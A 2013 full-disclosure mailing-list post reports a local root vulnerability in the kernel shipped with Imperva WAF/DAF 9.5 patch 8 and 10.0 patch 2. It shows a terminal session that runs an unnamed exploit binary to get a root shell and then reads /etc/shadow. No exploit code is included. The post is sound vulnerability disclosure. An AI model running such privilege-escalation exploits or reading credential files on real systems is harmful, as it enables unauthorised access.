Message-ID: <20131120151220.33280@gmx.com>
Date: Wed, 20 Nov 2013 10:12:19 -0500
From: "steve jobs" <job.steve@...l.com>
To: full-disclosure@...ts.grok.org.uk,sales@...erva.com,support@...erva.com
Cc: bugtraq@...urityfocus.com
Subject: Imperva WAF/DAF 9.5 patch8 and 10.0 patch 2 localroot vulnerability

Imperva uses hardened centos 5.4 to run its Web Application Firewall and Database Activity Monitoring products.
It could be exploited to get root in the kernel 2.6.18-164.15.1.el5.imp4, which was built by imperva in 9.5 patch 8 and 10.0 patch 2.
I hope imperva could upgrade your OS to centos 5.9 with kernel 2.6.18-348 to keep your system secure.
You can check the attachment for details.

[test95p8@...AF ~]$ uname -a
Linux GFWAF 2.6.18-164.15.1.el5.imp4 #1 SMP Mon Apr 8 15:29:20 IDT 2013 x86_64 x86_64 x86_64 GNU/Linux
[test95p8@...AF ~]$ cat /etc/redhat-release
Imperva release 5.4 (Final)
[test95p8@...AF ~]$ wc -l /etc/shadow
wc: /etc/shadow: Permission denied
[test95p8@...AF ~]$ id
uid=505(test95p8) gid=507(test95p8) groups=507(test95p8)
[test95p8@...AF ~]$ ./centos54_localroot_exp
########snip##############
sh-3.2# id
uid=0(root) gid=507(test95p8) groups=507(test95p8)
sh-3.2# wc -l /etc/shadow
40 /etc/shadow
sh-3.2#

[root@WAF ~]# impctl platform show 2> /dev/null | grep version
version 10.0.0.2_0
[root@WAF ~]# uname -a
Linux WAF 2.6.18-164.15.1.el5.imp4 #1 SMP Mon Apr 8 15:29:20 IDT 2013 x86_64 x86_64 x86_64 GNU/Linux
[root@WAF ~]# cat /etc/redhat-release
Imperva release 5.4 (Final)

Content of type "text/html" skipped

Download attachment "imperva10p2.png" of type "image/png" (40987 bytes)

Download attachment "imperva9.5p8.png" of type "image/png" (166423 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/